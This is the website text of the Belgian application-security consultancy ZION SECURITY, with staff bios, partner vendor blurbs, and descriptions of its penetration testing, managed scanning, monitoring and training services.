Erwin Geirnaert is a Master of Science in Computer Science from the University of Ghent, Belgium. He is specialized in information security. He obtained different international certifications like Certified Information Systems Security Professional from ISC² and Certified Information Systems Auditor from ISACA. He is a respected authority in the field of application security and has years of experience in securing e-business architectures. 

Colleagues

Johan Braeken graduated as professional bachelor in Applied Computer Science at the Provincial College in Hasselt. After a career at multiple Belgian consultancy companies such as Ubizen, Johan chose to join the ZION SECURITY -team. Johan has more than 10 years experience in information security and is a renowned Linux expert. He has various certificates and is specialized in networksecurity and firewalls. Johan has experience in penetration testing and audit, such as verifying whether systems are configured correctly according to the standards. Johan gives security training together with Erwin within ZION UNIVERSITY.

Christophe Joos graduated in 2008 as a Master in Economic Sciences. He specialized in Marketing Management. After a short period of employment at Toyota, he joined ZION SECURITY as head of Marketing and Sales. 

Maarten Aerts graduated in 2008 as a Professional Bachelor in Applied Computer Science. He worked at Ordina as a Junior Sharepoint Consultant. Maarten was hired by ZION SECURITY as a Software Security Expert.

About Vasco

Vasco is a Belgian leader in the market of strong authentication. Strong authentication helps securing the access to applications. A password is a not enough. Users are obliged to authenticate using a device, a Digipass, that will generate a single-use or one-tim password. With this password, access through a VPN can be setup secure as well as access to a webmail environment and web applications.

More information: www.vasco.com

Tufin

Most organizations have difficulties to manage and audit their increasingly complex firewall environments. Administrators today need a comprehensive management solution for monitoring all changes performed throughout their firewall policies.

Companies have come to understand the business impact of network security and to demand a high level of transparency and accountability. To meet these requirements, organizations need the ability to perform periodical audits to ensure compliance with three different levels of security directives: regulatory requirements, corporate policy and industry best practices.

Does your organisation has the capability to audit, manage and monitor your complex firewall environment?

Looking for a tool that can help you doing this? Discover now Tufin SecureTrack!

About Fortify

Fortify's Business Software Assurance products and services protect companies from the threats posed by security flaws in business-critical software applications.

Combining deep application security expertise with extensive software development experience, Fortify Software has defined the market with award-winning products that assure software security from development to production. Today, Fortify Software fortifies the software for the most demanding customer deployments, including the world’s largest, most varied code bases.

For more information visit www.fortify.com

ZION SECURITY selected Fortify for its static analysis tool. Static analysis of source code allows to execute a code review in an automated way, reducing manual analysis of C, C++, ASP.NET, Java, ... Security vulnerabilities are reported in a dashboard which will be verified by ZION SECURITY application security experts.

Fortify 360	Fortify 360 Fortify 360 identifies, prioritizes and helps you eliminate security vulnerabilities in software. It delivers: Vulnerability Detection: Detect vulnerabilities with static and dynamic analysis Collaborative Remediation: Fix vulnerabilities in a shared workspace Reporting and Governance: Manage and report on the process Threat Intelligence: Stay ahead with cutting edge research

About F5

F5 solutions provide an advanced web application firewall along with comprehensive web application security. This combination significantly reduces the risk of damage to intellectual property, data, and web applications. With F5, you get a complete solution that eliminates the need for multiple appliances, lowers maintenance and management costs, and increases the confidentiality, availability, and integrity of your applications and processes.

For more information visit www.f5.com

ZION SECURITY offers managed application security services (MASS) with the F5 Big-IP Application Security Manager (ASM), a secure and accurate web application firewall.

Download a whitepaper from F5 about web application firewalls

app-firewall-wp.pdf

About Breach Security

Breach Security, Inc., a leader in the emerging market for Intelligent Web Application Security, addresses today's Web security needs with next-generation Web protection solutions.

Breach's products address both enterprise and governmental needs using a unique combination of detection and prevention technology to secure business-critical Web applications from targeted cyber attacks. With Breach's Web application protection, cyber crimes are averted and privileged information remains secure.

Unlike existing network security solutions such as firewalls or intrusion detection and prevention systems (IDS/IPS) that address network-level threats across organizations, Breach technology fills the security gap left by existing technologies to address targeted application-level threats. Breach solutions provide an effective, automated, cost-effective means to secure Web applications from cyber attacks.

ZION SECURITY partnered with Breach Security for the open-source product ModSecurity. ModSecurity is the creation of Ivan Ristic, one of the experts in web application firewalls.

For more information about ModSecurity, click here.

About Testronic Laboratories

Testronic Laboratories, established in 1998, offers professional and confidential independent quality assurance services to the Home Entertainment and New Media Industries.

A worldwide service is offered from Testronic Laboratories' facilities in the US, UK, Belgium and Poland. In total, Testronic Labs employs over 260 permanent and freelance personnel.

Testronic Laboratories specialises in multimedia quality assurance for all types of content (film, game, music, etc.) on all mediums (DVD, HD-DVD, Blu-ray, CD, online, wireless, etc.) for all devices (optical players, PC, mobile equipment, game consoles, etc.).

Testronic Laboratories offers a wide variety and flexibility of services including Device Compatibility, Functionality, Content Verification & Compliance, Localisation Testing, Controlled Copy Protection Technology and Load Testing.

Testronic Labs' sites operate to identical standards, which are continually developed in conjunction with evolving markets, clients needs and experience gained over many years. This enables Testronic Labs to guarantee the uniformity of approach essential to multinational developers, titleholders, publishers, distributors and manufacturers.

For more information, please visit www.testroniclabs.com.

About WhiteHat Security

WhiteHat Security was founded in August 2001 by a team led by Jeremiah Grossman, a security industry veteran and former Yahoo! information security officer. Jeremiah founded the company to provide a comprehensive solution to the growing problem of website security. The company is privately held and headquartered in Santa Clara, California, with sales offices in Austin, Texas and New York, New York.

WhiteHat develops comprehensive, easy-to-use, cost-effective solutions that enable companies to secure valuable customer data, meet federal compliance standards, and maintain customer confidence.

ZION SECURITY is partner of WhiteHat Sec for his innovative web application scanning software called WhiteHat Sentinel.

WhiteHat Sentinel is built on a Software-as-a-Service (SaaS) platform designed from the ground up to scale massively, support the largest enterprises and offer the most compelling business efficiencies, lowering your overall cost of ownership.

We integrated WhiteHat Sentinel in our revolutionary service ZION VERIFIED. With ZION VERIFIED, you pay a single annual fee and you assess your applications as often as you like.

Click here for more information about ZION VERIFIED.

For more information about WhiteHat Security, please visit www.whitehatsec.com.

Splunk

Can you imagine the chaos using the Internet without a search engine?

Well, your datacenter is just as chaotic. Do you know at this moment what's happening in your IT infrastructure? How do you find the valuable information you need burled in all the logs? How do you detect the IT data your infrastructure generates every day?

Splunk has an answer on these specific questions.

ZION VERIFIED key benefits:

1. Managed Web Application Security

• No need to hire external consultants or penetration testers for a one-shot security audit
• No need to train internal people about web application security and the most recent attacks and countermeasures
• Custom-built web applications will be tested on a regular schedule 
• We provide clean, detailed information regarding each vulnerability identified (including remediation recommendations)
• ZION SECURITY will contact the right people in your organization to fix the vulnerabilities and we make sure that it is fixed!

2. Predictable costs & Unlimited assessments

• ZION VERIFIED is subscription based. So no matter how many times you run your application assessments, your costs remain the same.

3. Turn-key service

• No additional Staff or Infrastructure
• No software configuration or management

4. WAF Integration

• A fast and safe Web Application Firewall (WAF) integration closes the loop between vulnerability detection and mitigation. Our security experts can install and configure a WAF to block all discovered vulnerabilities. ZION VERIFIED integrates with the WAF of F5 or our ZION SECURED solution.

5. Scalable to fit any environment

• ZION VERIFIED can scale and assess the largest and most complex websites simultaneously

ZION UNIVERSITY

ZION SECURITY developed, together with experts in the security field, different courses for our customers.

These courses can be customized for each customer to match their technology and software development methodology.

Courses can be delivered in-house or off-site. Most courses are a mix of theory and hands-on labs.

Planned courses

Currently the following courses are available (on request):

• Hacking Web Applications: how to discover and abuse security vulnerabilitities in web applications
• Security Testing: how to test a web application for known security vulnerabilities
• Penetration Testing: how to attack a network, infrastructure and application using open-source tools
• Network Security: what is required to protect your network against hackers
• Application Security for Java: how to build secure Java (web) applications
• Application Security for .NET: how to build secure .NET (web) applications
• Web Services Security: how to protect web services against hackers
• ModSecurity: how to configure and use ModSecurity, the open-source web application firewall.

ZION UNIVERSITY: Interested?

Want to know more? Ask here for more information.

ZION MONITORED: Mission

Through ZION MONITORED we help you to manage your systems.

ZION MONITORED: Working method

We install a small application on your client and server systems. This allows us to monitor your server, whenever something should go wrong, is it either software or system resources, we can respond to this malfunctioning and resolve the problem.

Next to the server monitoring, we provide both clients as server with the latest available updates. This way we ensure your network to be up to date. The client systems can request help through a ticket or a chat-session.

Whenever a client-computer needs assistance to which one of our technicians needs be physically there, our application allows us to remote control the client-computer and resolve the problem from our office.

ZION MONITORED: Interested?

Want to know more? Ask here fore more information or a proposal without obligation.

 Penetration test

Do you wish to know if your IT infrastructure and web applications are protected sufficient against threats like virusses and hackers?

ZION SECURITY scans your infrastructure and applications, for a fixed price, for leaks and vulnerabilities. In a first meeting between the customer and our security experts, we discuss what exactly has to be tested and how. Penetration tests can be executed in different ways, namely Black box testing and White box testing.

Black box testing assumes no prior knowledge of the infrastructure and applications that has to be tested. We act like a real hacker and try to break into your applications and systems. Our security experts must first determine the location and extent of the systems, before beginning the analysis. White box testing provides the testers with complete knowledge of the infrastructure that has to be tested. This can include network diagrams and IP addressing information.

The customer decides which methods can be used to execute the penetration test and where the focus lays (on an infrastructure level or web application level).

Upon completion of this scan the customer will receive a final report containing:

1. The network scheme as identified by ZION SECURITY
2. A list of vulnerabilities and leaks in your applications and systems
3. A plan of operation indicating the priority, possible cost and the time of implementation

This report will be discussed at length with the responsible person regarding these matters in the company.

The difference between a penetration test and Quick Scan is that a penetration test has a larger scope and is not limited in time. A penetration test is ideal for obtaining a clear picture of the general security level of your organization.

Files

ZION SECURITY Services - Design Review.pdf

 Interested?

Ask here for more information or an offer without obligation. However when a one-time audit of your web applications is not enough, please check out or new service ZION VERIFIED.

Presentations, papers and cases

Here you can download some of our technical papers and presentations. More papers will be added in the near future.

The presentation "Security for Virtualization" from the Infosecurity conference (march 2009).

The presentation "Hacking the SOA" from the Enterprise SOA Conference is available here.

The presentation "Can (Automated) Testing Tools Really Find the OWASP Top 10?" from the OWASP Application Security Conference Europe 2006.

The first paper is "Getting started with OWASP WebGoat and SOAPUI", written by Philippe Bogaerts.

Our name 

In the movie "The Matrix" ZION was the last safe place for humans in a world dominated by machines. The security of ZION consisted of multiple layers of defense, just like ZION SECURITY approaches information security. More information can be found at Wikipedia.

Our mission

Securing your busines value by securing your applications.

Our technology partners

ZION SECURITY has selected the world leading software solutions in the field of web application security and application security. Our technology partners are Breach Security, F5, Splunk, WhiteHat Security, Testronic Labs, Tufin, Marshal and Fortify.

With these solutions ZION SECURITYs application security experts can assess, secure and protect your critical business applications in a managed way. Every organization can outsource their application security needs to ZION SECURITY, we know where and how to find the vulnerabilities in your critical business applications!

On top of that we secure your business value, for example securing your VPN connection.

Our mission is to secure your business value by securing your applications.

Securing this value is a continuous process, specific depending on the customer's situation.

ZION SECURITY has a customer oriented approach and can offer a global solution and this for every company with its own needs and requests.

For every security project we follow the following steps:

• At the start of the security project we analyze together with the customer the actual and future needs concerning security.
• With this analysis we propose the customer a specific solution.
• In the next step our security experts perform the solution, as described in the previous phase.
• After performing the security project, our experts support the customer where needed.

ZION SECURITY believes in the delivery of a high quality and precise work for such delicate projects. ZION SECURITY guarantees such a quality.